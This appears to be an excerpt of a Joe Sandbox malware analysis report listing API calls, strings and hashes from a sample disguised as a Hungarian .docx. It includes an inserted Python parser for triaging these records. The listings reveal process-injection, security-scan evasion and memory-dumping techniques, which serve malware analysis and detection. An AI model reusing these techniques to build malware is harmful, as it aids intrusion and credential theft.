                                                                                                                                                    • Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                    • Part of subcall function 029B8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029B8814
                                                                                                                                                  • GetThreadContext.KERNEL32(00000000,02A27424,ScanString,02A273A8,029BA93C,UacInitialize,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,UacInitialize,02A273A8), ref: 029B9602
                                                                                                                                                    • Part of subcall function 029B7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029B7A9F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                   • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                   • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateContextCreateFreeLibraryMemoryProcessThreadUserVirtual
                                                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                  • API String ID: 4276370345-51457883
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,029A737C,029A0000,029CE790), ref: 029A5925
                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029A593C
                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,?), ref: 029A596C
                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,029A737C,029A0000,029CE790), ref: 029A59D0
                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,029A737C,029A0000,029CE790), ref: 029A5A06
                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,029A737C,029A0000,029CE790), ref: 029A5A19
                                                                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,029A737C,029A0000,029CE790), ref: 029A5A2B
                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029A737C,029A0000,029CE790), ref: 029A5A37
                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029A737C,029A0000), ref: 029A5A6B
                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029A737C), ref: 029A5A77
                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 029A5A99
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                  • API String ID: 3245196872-1565342463
                                                                                                                                                  • Opcode ID: 662f5b951866b0430ebe2d6384c65726ed3dd444f23e826582502936842e4d58
                                                                                                                                                  • Instruction ID: 4fef65efb9521561bca01860535d32b2e26971dbf8cf6e791b86d2a34dc68999
                                                                                                                                                  • Opcode Fuzzy Hash: 662f5b951866b0430ebe2d6384c65726ed3dd444f23e826582502936842e4d58
                                                                                                                                                  • Instruction Fuzzy Hash: 9E417F71F00329AFDB20DAE8CC98ADEB3BDAF88344F4545A5E549E7241E730DA448F90
                                                                                                                                                  APIs
                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 029A5BE8
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 029A5BF5
                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 029A5BFB
                                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 029A5C26
                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029A5C6D
                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029A5C7D
                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029A5CA5
                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029A5CB5
                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 029A5CDB
                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 029A5CEB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                  • API String ID: 1599918012-2375825460
                                                                                                                                                  • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                                  • Instruction ID: 2ffc2027f53f624d7d1d482dcecdba686fc3730f2fd1391b48f9c24a7e5263fb
                                                                                                                                                  • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                                  • Instruction Fuzzy Hash: D1319371E4036C2AEF25D6B88C95FDE77BD9B44380F4501A1AA08E6185EB74DE888FD0
                                                                                                                                                  APIs
                                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 029A7FF5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DiskFreeSpace
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1705453755-0
                                                                                                                                                  • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                                  • Instruction ID: 06536fef386f474ab8478ba024374e09e90fdb0817f85d7da66c0a9556ad0cff
                                                                                                                                                  • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                                  • Instruction Fuzzy Hash: EA11C0B5E00209AFDB04DF99C981DBFF7F9FFC8300B54C569A505E7254E6719A018B90
                                                                                                                                                  APIs
                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029AA7E2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                  • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                                  • Instruction ID: 91cd18fe1a71b44b77aadcffbc016db90af4ad35e209f1b38adb27f92e8576e5
                                                                                                                                                  • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                                  • Instruction Fuzzy Hash: 40E0D871B0031417D715A55C9CA0EFAB26D9798310F00527ABD05C7385EEE09E808AE8
                                                                                                                                                  APIs
                                                                                                                                                  • GetVersionExA.KERNEL32(?,029CD106,00000000,029CD11E), ref: 029AB79A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Version
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                  • Opcode ID: 730f10992f5426ae62624140942aa53e6bbc2eb4c96dd47131dc725bae24d07e
                                                                                                                                                  • Instruction ID: 20e26d4181ab3bb168ac910a8b79daf12acada992146b89e7c967fc2fb00fd31
                                                                                                                                                  • Opcode Fuzzy Hash: 730f10992f5426ae62624140942aa53e6bbc2eb4c96dd47131dc725bae24d07e
                                                                                                                                                  • Instruction Fuzzy Hash: C7F012749483018FD340DF28D450A2A77E9FB88704F108D38EADAC7780E7789824CF92
                                                                                                                                                  APIs
                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,029ABE72,00000000,029AC08B,?,?,00000000,00000000), ref: 029AA823
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                  • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                                  • Instruction ID: 9b67188e81b76efac6ee895612bad1d1c33a89649ded1525c9b095e492132848
                                                                                                                                                  • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                                  • Instruction Fuzzy Hash: 39D05EB630E3602AE214915E6D94D7B5AECCAC57A1F05443AB988C6101D2008C07DAF1
APIs
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID: LocalTime
• String ID:
• API String ID: 481472006-0
• Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
• Instruction ID: e72db091c69c17d286227903419867d97fde1995c35f4c3aa5ed187b21bf7e95
• Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
• Instruction Fuzzy Hash: 86A0124440492041C940331C0C0253430445850A20FC8874068F8402D0F91D012080D3
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
• Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
• Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
• Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 029AD29D
  • Part of subcall function 029AD268: GetProcAddress.KERNEL32(00000000), ref: 029AD281
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
• API String ID: 1646373207-1918263038
• Opcode ID: abc5ef7da9d45a2e5cd558e2921780b4f422319136d0dc43cf7177129bcc0fdc
• Instruction ID: 4b653e6f706dceff1b9561a58c8ba4fc0ca0924047b515ac93235648bb807df1
• Opcode Fuzzy Hash: abc5ef7da9d45a2e5cd558e2921780b4f422319136d0dc43cf7177129bcc0fdc
• Instruction Fuzzy Hash: 984147A1A893085B52186B6D7830477F7DED684B143A2561AF8088BF84DE30FD56CBF9
APIs
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 029B6EDE
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 029B6EEF
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 029B6EFF
• GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 029B6F0F
• GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 029B6F1F
• GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 029B6F2F
• GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 029B6F3F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
• API String ID: 667068680-2233174745
• Opcode ID: 13ac489bc3f2b4946f09bf7ae904cd06c2ed3b08ca087b02ce95039c202959db
• Instruction ID: 57d61b18de70955b5042c31518ed1e9555762dd0ac97fa32a05f55087da76a7f
• Opcode Fuzzy Hash: 13ac489bc3f2b4946f09bf7ae904cd06c2ed3b08ca087b02ce95039c202959db
• Instruction Fuzzy Hash: 5EF0ACF2A8C3807DFF01BB795E998763B6DADA16043141C39A943555C2E675B4108F90
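A worked example, added here and not part of the Joe Sandbox report or its tooling: a small Python parser for these "Memory Dump Source" function records. For each record it extracts the import names resolved at run time through GetModuleHandleA/GetProcAddress (the pattern in the oleaut32.dll and ole32.dll records above), flags String IDs that look like compiler runtime-library boilerplate, and converts the call-site "ref:" addresses into RVAs using the reported Offset. The sample input is a constructed, abbreviated copy of two records from this page; the runtime-string prefixes are my own assumption (Delphi RTL / FastMM messages, which the report does not itself classify), and the record-splitting rule (one record ends at its "Instruction Fuzzy Hash" line) is inferred from the layout on this page.

```python
"""Parse Joe Sandbox 'Memory Dump Source' function records (plain-text form as
on this page) into per-function summaries a triage analyst can act on."""
import re
from dataclasses import dataclass, field

# Constructed, abbreviated sample in the shape of the records above (hashes and
# addresses copied from this page; 'Associated' and most ID lines dropped).
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 029B6EDE
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 029B6EEF
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 029B6EFF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_29a0000_sample.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CoCreateInstanceEx$CoInitializeEx$ole32.dll
• Instruction Fuzzy Hash: 5EF0ACF2A8C3807DFF01BB795E998763B6DADA16043141C39A943555C2E675B4108F90
APIs
• MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029A28CE
Strings
• Unexpected Memory Leak, xrefs: 029A28C0
• An unexpected memory leak has occurred. , xrefs: 029A2690
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
Similarity
• API ID: Message
• String ID: Unexpected Memory Leak$Unknown
• Instruction Fuzzy Hash: CCA10330E043648BDB21AB2CCCA0B98B7E9FB49754F1440E5ED49AB285CB759AC5CFD1
"""

API_RE = re.compile(r"(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)")
STR_RE = re.compile(r"^(.*), xrefs: ([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Assumption: these prefixes are Delphi RTL / FastMM messages, not loader logic.
RUNTIME_PREFIXES = ("Unexpected Memory Leak", "An unexpected memory leak", "Runtime error at")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int       # virtual address of the call site
    subcall: bool  # reported as 'Part of subcall function ...'


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (text, xref VA)
    ids: dict = field(default_factory=dict)      # Similarity / IDA plugin key -> value
    image_base: int = 0
    based_on_pe: bool = False

    def rva(self, va: int) -> int:
        """Translate a 'ref:' virtual address into an RVA within the dumped image."""
        return va - self.image_base

    def dynamic_imports(self) -> dict:
        """Module from GetModuleHandle*/LoadLibrary* -> names passed to GetProcAddress."""
        module, resolved = None, {}
        for c in self.apis:
            if c.name.startswith(("GetModuleHandle", "LoadLibrary")) and c.args:
                module = c.args[0]
                resolved.setdefault(module, [])
            elif c.name == "GetProcAddress" and len(c.args) > 1 and c.args[1] not in ("?", "00000000"):
                resolved.setdefault(module or "<unknown>", []).append(c.args[1])
        return resolved

    def runtime_strings(self) -> list:
        """String-ID entries that match the assumed runtime-library message prefixes."""
        return [s for s in self.ids.get("String ID", "").split("$")
                if any(s.startswith(p) for p in RUNTIME_PREFIXES)]


def parse_records(text: str) -> list:
    """One FunctionRecord per block; a block ends at its 'Instruction Fuzzy Hash' line."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADINGS:
            section = line
            continue
        body = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.search(body)
            if m:
                args = [a.strip() for a in m.group(3).split(",")] if m.group(3) else []
                cur.apis.append(ApiCall(m.group(1), m.group(2), args, int(m.group(4), 16),
                                        body.startswith("Part of subcall")))
        elif section == "Strings":
            m = STR_RE.match(body)
            if m:
                cur.strings.append((m.group(1), int(m.group(2), 16)))
        elif section == "Memory Dump Source":
            m = SRC_RE.search(body)
            if m:
                cur.image_base, cur.based_on_pe = int(m.group(2), 16), m.group(3) == "true"
        elif section in ("Joe Sandbox IDA Plugin", "Similarity"):
            key, _, value = body.partition(":")
            cur.ids[key.strip()] = value.strip()
            if key.strip() == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    return records


def triage(records: list) -> list:
    """Per record: fuzzy hash, run-time resolved imports, runtime strings, call-site RVAs."""
    return [{"ihash": r.ids.get("Instruction Fuzzy Hash", ""),
             "dynamic_imports": r.dynamic_imports(),
             "runtime_strings": r.runtime_strings(),
             "call_rvas": [hex(r.rva(c.ref)) for c in r.apis]} for r in records]


if __name__ == "__main__":
    for row in triage(parse_records(SAMPLE)):
        print(row)
```

Run over the full report text, this separates functions that only resolve well-known COM/Variant helpers or raise memory-leak and runtime-error dialogs (typical of a compiler's runtime library) from functions whose API use is worth reading by hand, and the per-record Instruction Fuzzy Hash can then be reused to skip the same runtime functions when diffing against other samples. The RVA conversion depends on "based on PE: true" and on the Offset being the image base of that dump, which is what the report states for this module.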
APIs
• MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029A28CE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
• Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmp
